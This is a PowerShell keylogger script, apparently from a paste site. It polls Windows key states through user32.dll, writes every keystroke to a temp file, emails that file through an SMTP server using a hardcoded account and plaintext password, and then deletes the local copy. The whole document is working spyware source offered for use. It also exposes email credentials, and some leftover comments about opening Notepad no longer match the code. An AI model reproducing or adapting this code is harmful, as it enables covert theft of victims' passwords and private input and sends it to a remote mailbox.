# Edit only this section!$TimesToRun = 1$RunTimeP = 1$From = "cordeliabobo

1. # Edit only this section!
2. $TimesToRun = 1
3. $RunTimeP = 1
4. $From = "[email protected]"
5. $Pass = "Hulkbulk12390"
6. $To = "[email protected]"
7. $Subject = "Keylogger Results"
8. $body = "Keylogger Results"
9. $SMTPServer = "smtp.mail.com"
10. $SMTPPort = "587"
11. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
12. ############################
13.  
14.  
15. $TimeStart = Get-Date
16. $TimeEnd = $timeStart.addminutes($RunTimeP)
17.  
18. #requires -Version 2
19. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
20. {
21. # Signatures for API Calls
22. $signatures = @'
23. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
24. public static extern short GetAsyncKeyState(int virtualKeyCode);
25. [DllImport("user32.dll", CharSet=CharSet.Auto)]
26. public static extern int GetKeyboardState(byte[] keystate);
27. [DllImport("user32.dll", CharSet=CharSet.Auto)]
28. public static extern int MapVirtualKey(uint uCode, int uMapType);
29. [DllImport("user32.dll", CharSet=CharSet.Auto)]
30. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
31. '@
32.  
33. # load signatures and make members available
34. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
35.  
36. # create output file
37. $null = New-Item -Path $Path -ItemType File -Force
38.  
39. try
40. {
41.  
42. # create endless loop. When user presses CTRL+C, finally-block
43. # executes and shows the collected key presses
44. $Runner = 0
45. while ($TimesToRun -ge $Runner) {
46. while ($TimeEnd -ge $TimeNow) {
47. Start-Sleep -Milliseconds 40
48.  
49. # scan all ASCII codes above 8
50. for ($ascii = 9; $ascii -le 254; $ascii++) {
51. # get current key state
52. $state = $API::GetAsyncKeyState($ascii)
53.  
54. # is key pressed?
55. if ($state -eq -32767) {
56. $null = [console]::CapsLock
57.  
58. # translate scan code to real code
59. $virtualKey = $API::MapVirtualKey($ascii, 3)
60.  
61. # get keyboard state for virtual keys
62. $kbstate = New-Object Byte[] 256
63. $checkkbstate = $API::GetKeyboardState($kbstate)
64.  
65. # prepare a StringBuilder to receive input key
66. $mychar = New-Object -TypeName System.Text.StringBuilder
67.  
68. # translate virtual key
69. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
70.  
71. if ($success)
72. {
73. # add key to logger file
74. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
75. }
76. }
77. }
78. $TimeNow = Get-Date
79. }
80. send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
81. Remove-Item -Path $Path -force
82. }
83. }
84. finally
85. {
86. # open logger file in Notepad
87. exit 1
88. }
89. }
90.  
91. # records all key presses until script is aborted by pressing CTRL+C
92. # will then open the file with collected key codes
93. Start-KeyLogger